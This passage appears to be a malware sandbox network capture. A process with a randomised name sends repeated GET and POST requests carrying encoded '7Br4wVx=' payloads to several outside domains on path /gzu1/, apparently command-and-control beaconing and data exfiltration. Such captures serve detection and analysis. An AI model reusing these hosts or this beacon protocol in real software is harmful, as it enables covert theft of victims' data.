7Br4wVx=Aece2c3eButfBLzxd6JKvtuTD7KOJlswl/3KyvkYr6m6IkR0z2v7rhNkJxalfKTjwgI4SPHbIrN7MBhiX8ssVTzUxw0boi8Y0ChMKQTu3CdVhlVk56X7RVTtjoKMRGZbZ/THbTMKXlrgnUuFTz0cPIDQCavcChvpNysoQhhn6pDdDCQHrTXQHUJgGWipgQjBXeZc7zcmDx6hPk+mwh+TDPU=
May 2, 2024 15:09:02.383344889 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 May 2024 13:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 32 30 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 9d 54 bd 8e d3 40 10 ee f3 14 83 d3 40 e1 f8 87 9c 94 33 be 34 fc 94 70 45 04 a2 1c 7b c7 f1 ea 6c af d9 5d e7 08 08 09 51 1d ef 00 05 94 54 34 b4 bc 0c e2 a4 7b 0b 76 6d 1f 89 23 eb 4e ba 2d ec f5 7c 33 f3 ed ce 37 e3 f8 de 93 17 8f 57 af 4f 9f 42 ae cb 62 39 89 af 5f 84 6c 39 01 b3 e2 92 34 42 9a a3 54 a4 4f 9c 46 67 ee c2 01 af 07 35 d7 05 2d 9f 0b 0d cf 44 53 31 b8 3f 9d fb f3 07 b1 d7 d9 27 5d 06 a5 b7 c6 a9 dd db 95 08 b6 85 f7 ff 3f ad 29 13 95 8e a0 12 b2 c4 02 8e 6b 0d ce 4b 92 0c 2b 74 1e 0d fc 52 51 08 19 c1 d4 f7 fd 21 90 60 7a b6 96 f6 08 06 cd b2 6c 87 7e e8 0e 61 59 f2 e0 26 da 60 71 3b 6f 76 c8 5b a2 5c f3 ca 4d 84 d6 a2 8c 60 76 44 e5 38 75 78 23 f5 fc 76 ea 85 b9 f3 9d d9 1f 8e b2 27 a2 60 10 04 e3 dc 7b 75 ab 47 a3 ef a8 d6 5e de d9 86 a4 e2 a2 3a 48 df 8b bc 96 b8 1d 8a 6c bb c4 55 fc 1d 45 60 b4 3a 68 00 21 19 49 57 8b 3a 82 a0 7e 0b 4a 14 9c c1 14 11 87 7e 35 32 c6 ab 75 ef b8 af 96 ed 90 03 39 83 a1 9a d6 23 f6 fa 6e 8e bd bc 9d 91 [TRUNCATED] Data Ascii: 208T@@34pE{l]QT4{vm#N-\|37WOBb9_l94BTOFg5-DS1?']?)kK+tRQ!`zl~aY&`q;ov[\M`vD8ux#v'`{uG^:HlUE`:h!IW:~J~52u9#nIl<c W~]}~/~{*'DlHJ!Ai#%18yAP$MRlE#Au^;8-AjFl34xdjS3@N^Xgw!AGfD3wE5iK0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49767	47.76.136.160	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:04.899837017 CEST	389	OUT	GET /gzu1/?7Br4wVx=Nc0+1pbABO8bD/b9Wv0Sz/i9XafwHDVY8M6N2p8pgISzJF1z8hz/2TN9JRK2WZ6dwSE5fOiQX7UBBH0PbssqVTyxxREEszEt/mQOHjL8tipl5lQA7LzYQXo=&Y0H=66WP HTTP/1.1 Host: www.qdzdvrk.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:09:05.208345890 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 May 2024 13:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 34 61 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 38 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d [TRUNCATED] Data Ascii: 4ab<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 { font: normal 18pt "Verdana"; color: #f00; margin-bottom: .5em; } h2 { font: normal 14pt "Verdana"; color: #800000; margin-bottom: .5em; } h3 { font: bold 11pt "Verdana"; } p { font: normal 9pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head><body> <h1>Not Found (#404)</h1> <h2></h2> <p> The above error occurred while the Web server was processing your request. </p> [TRUNCATED]
May 2, 2024 15:09:05.208374023 CEST	106	IN	Data Raw: 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 65 72 73 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 32 30 32 34 2d 30 35 2d 30 32 20 32 31 3a 30 39 3a 30 35 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 Data Ascii: <div class="version"> 2024-05-02 21:09:05 </div> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49768	47.243.134.243	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:11.943095922 CEST	658	OUT	POST /gzu1/ HTTP/1.1 Host: www.cngdesk.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.cngdesk.com Referer: http://www.cngdesk.com/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 6e 46 44 30 38 43 51 47 6b 30 58 2b 6a 46 66 6c 37 42 49 6d 6e 34 71 4f 32 6a 59 67 31 45 55 2b 43 57 4c 45 53 50 76 6c 37 61 35 72 43 4f 52 55 37 42 55 4a 44 6e 58 37 42 53 4a 72 38 4f 43 77 34 6e 6b 71 61 30 30 56 76 4c 36 71 2f 56 64 53 39 70 79 70 35 78 79 39 76 6e 30 49 68 7a 66 48 6f 71 4b 77 50 33 53 59 53 6f 36 76 46 4c 38 65 70 4a 57 4a 6d 74 52 63 2b 6d 79 56 32 34 2b 37 58 72 6e 4f 35 67 37 6a 4b 4d 49 76 35 50 62 31 79 2b 6e 33 57 57 7a 46 58 4a 58 6a 4e 6a 4c 57 64 2f 69 4b 4c 55 54 43 47 6b 55 7a 43 34 54 75 77 55 65 59 30 30 50 71 54 76 63 64 2f 4d 6b 47 31 77 3d 3d Data Ascii: 7Br4wVx=nFD08CQGk0X+jFfl7BImn4qO2jYg1EU+CWLESPvl7a5rCORU7BUJDnX7BSJr8OCw4nkqa00VvL6q/VdS9pyp5xy9vn0IhzfHoqKwP3SYSo6vFL8epJWJmtRc+myV24+7XrnO5g7jKMIv5Pb1y+n3WWzFXJXjNjLWd/iKLUTCGkUzC4TuwUeY00PqTvcd/MkG1w==
May 2, 2024 15:09:12.248049974 CEST	354	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 02 May 2024 13:09:12 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cngdesk.com/gzu1/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49769	47.243.134.243	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:14.777241945 CEST	678	OUT	POST /gzu1/ HTTP/1.1 Host: www.cngdesk.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.cngdesk.com Referer: http://www.cngdesk.com/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 6e 46 44 30 38 43 51 47 6b 30 58 2b 6a 6c 50 6c 39 69 51 6d 33 6f 71 42 71 7a 59 67 73 30 55 79 43 57 58 45 53 4f 72 31 37 73 4a 72 42 72 74 55 34 41 55 4a 41 6e 58 37 4b 79 49 6a 32 75 44 2b 34 6e 70 58 61 77 38 56 76 4c 2b 71 2f 58 46 53 38 61 61 71 32 42 79 6a 6a 48 30 4b 73 54 66 48 6f 71 4b 77 50 33 47 68 53 6f 69 76 46 62 4d 65 37 72 75 49 34 39 52 66 6f 32 79 56 79 34 2b 2f 58 72 6e 38 35 68 33 46 4b 4b 55 76 35 50 72 31 7a 71 54 30 66 57 7a 44 5a 70 57 32 65 6a 61 34 46 71 75 48 55 33 76 47 4e 55 67 49 4f 65 43 30 68 6c 2f 50 6d 30 72 5a 4f 6f 56 70 79 50 5a 50 75 37 51 4c 6f 72 2f 50 57 52 76 73 46 4b 34 45 61 6f 77 65 2b 77 49 3d Data Ascii: 7Br4wVx=nFD08CQGk0X+jlPl9iQm3oqBqzYgs0UyCWXESOr17sJrBrtU4AUJAnX7KyIj2uD+4npXaw8VvL+q/XFS8aaq2ByjjH0KsTfHoqKwP3GhSoivFbMe7ruI49Rfo2yVy4+/Xrn85h3FKKUv5Pr1zqT0fWzDZpW2eja4FquHU3vGNUgIOeC0hl/Pm0rZOoVpyPZPu7QLor/PWRvsFK4Eaowe+wI=
May 2, 2024 15:09:15.078968048 CEST	354	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 02 May 2024 13:09:14 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cngdesk.com/gzu1/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49770	47.243.134.243	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:17.595299959 CEST	388	OUT	GET /gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP HTTP/1.1 Host: www.cngdesk.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:09:17.898776054 CEST	492	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 02 May 2024 13:09:17 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.cngdesk.com/gzu1/?7Br4wVx=qHrU/ycFjG31mFHi/zg+n8+l32EylT8zNFfCUKb22Nc1EMRw4DAgdGnBBmRrxsDJ2EJ0WhI3vZ6+3kEV8pm1/TOgq31Qtmfxg5HCN3XsFKKvE88rt5vqtco=&Y0H=66WP Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49771	162.0.237.22	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:37.566334009 CEST	658	OUT	POST /gzu1/ HTTP/1.1 Host: www.shevgin.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.shevgin.top Referer: http://www.shevgin.top/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 70 6c 66 34 76 41 38 74 72 5a 62 4b 57 6e 59 51 79 30 30 59 79 65 6a 53 37 44 64 61 44 4a 65 4b 4b 75 50 67 56 58 70 6d 5a 53 32 7a 4d 4c 48 41 6f 57 78 6f 4c 6b 33 58 4d 6b 79 6f 76 75 53 61 61 52 38 65 6b 4d 4d 39 30 31 58 68 42 76 62 64 57 6a 48 79 31 6a 51 49 79 6f 42 58 72 4b 49 2f 56 38 35 41 6b 4c 33 70 67 46 76 6a 66 55 32 7a 58 71 64 4b 59 31 32 68 30 5a 5a 49 6a 67 49 47 79 36 71 5a 34 35 73 73 63 5a 30 59 51 39 6b 32 34 35 67 4b 52 4f 78 68 67 65 51 73 4c 50 64 4d 70 6c 63 4d 30 69 67 54 59 6c 62 41 4a 69 4d 34 4b 32 2f 51 2b 4c 38 4a 48 61 30 52 55 37 47 47 74 77 3d 3d Data Ascii: 7Br4wVx=plf4vA8trZbKWnYQy00YyejS7DdaDJeKKuPgVXpmZS2zMLHAoWxoLk3XMkyovuSaaR8ekMM901XhBvbdWjHy1jQIyoBXrKI/V85AkL3pgFvjfU2zXqdKY12h0ZZIjgIGy6qZ45sscZ0YQ9k245gKROxhgeQsLPdMplcM0igTYlbAJiM4K2/Q+L8JHa0RU7GGtw==
May 2, 2024 15:09:37.745630980 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 02 May 2024 13:09:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49772	162.0.237.22	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:40.903861046 CEST	678	OUT	POST /gzu1/ HTTP/1.1 Host: www.shevgin.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Origin: http://www.shevgin.top Referer: http://www.shevgin.top/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 70 6c 66 34 76 41 38 74 72 5a 62 4b 57 48 6f 51 30 54 6f 59 36 65 6a 56 6c 7a 64 61 4b 70 65 47 4b 75 4c 67 56 57 63 37 5a 42 43 7a 4d 71 62 41 76 55 5a 6f 4d 6b 33 58 55 55 79 74 68 4f 53 45 61 52 67 38 6b 49 49 39 30 31 7a 68 42 71 33 64 57 51 76 78 7a 7a 51 64 2b 49 42 56 32 36 49 2f 56 38 35 41 6b 50 66 50 67 47 66 6a 66 6e 75 7a 57 4c 64 4a 5a 31 32 69 7a 5a 5a 49 75 41 49 43 79 36 71 37 34 34 67 53 63 62 38 59 51 35 6f 32 34 6f 67 4c 66 4f 77 71 76 2b 52 66 42 74 38 39 74 33 6c 68 72 68 49 6a 58 78 4f 6d 42 45 64 69 62 48 65 48 73 4c 59 36 61 64 39 6c 5a 34 37 50 32 34 53 6b 35 34 2b 53 62 72 6f 76 61 41 7a 48 67 68 33 6d 54 59 41 3d Data Ascii: 7Br4wVx=plf4vA8trZbKWHoQ0ToY6ejVlzdaKpeGKuLgVWc7ZBCzMqbAvUZoMk3XUUythOSEaRg8kII901zhBq3dWQvxzzQd+IBV26I/V85AkPfPgGfjfnuzWLdJZ12izZZIuAICy6q744gScb8YQ5o24ogLfOwqv+RfBt89t3lhrhIjXxOmBEdibHeHsLY6ad9lZ47P24Sk54+SbrovaAzHgh3mTYA=
May 2, 2024 15:09:41.072809935 CEST	533	IN	HTTP/1.1 404 Not Found Date: Thu, 02 May 2024 13:09:40 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49773	162.0.237.22	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:43.588320017 CEST	388	OUT	GET /gzu1/?7Br4wVx=kn3Ys08AlLLcTB8c3mh/ndv1lRtAG+6GF4y4CDUXNC25SpPwtUp0dEf6cWyblfDnSRkBocYG/2n1J5W5fw7V+kx237huy5oCC9wi7uOTnETtOi+sV7JzakA=&Y0H=66WP HTTP/1.1 Host: www.shevgin.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
May 2, 2024 15:09:43.761674881 CEST	548	IN	HTTP/1.1 404 Not Found Date: Thu, 02 May 2024 13:09:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49774	217.160.0.13	80	1704	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe

Timestamp	Bytes transferred	Direction	Data
May 2, 2024 15:09:58.680465937 CEST	682	OUT	POST /gzu1/ HTTP/1.1 Host: www.wrgardenrooms.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Origin: http://www.wrgardenrooms.co.uk Referer: http://www.wrgardenrooms.co.uk/gzu1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Data Raw: 37 42 72 34 77 56 78 3d 4f 62 69 48 65 4d 79 79 73 58 37 78 6f 53 4b 61 31 58 6a 32 34 6a 36 6b 35 6a 50 77 4c 6d 35 78 52 62 47 59 73 78 50 6f 36 65 45 67 4b 67 53 73 6d 43 79 53 61 59 6e 6d 41 6d 57 38 39 30 4c 39 58 68 41 64 76 42 43 35 58 6b 69 32 64 39 36 50 68 6a 79 44 36 4a 47 36 6c 57 68 4f 63 4e 59 6a 39 61 6b 68 6c 74 71 6b 7a 45 74 43 6d 6e 79 73 59 4a 36 45 45 69 45 2b 54 38 74 72 56 65 68 4c 35 46 78 70 63 67 2f 64 78 4c 61 61 77 6a 6d 53 67 49 32 42 33 64 33 6a 6a 4d 44 41 62 4d 57 79 72 49 49 4c 56 54 47 53 75 32 72 6d 73 53 36 47 33 6d 38 2b 4b 6f 75 68 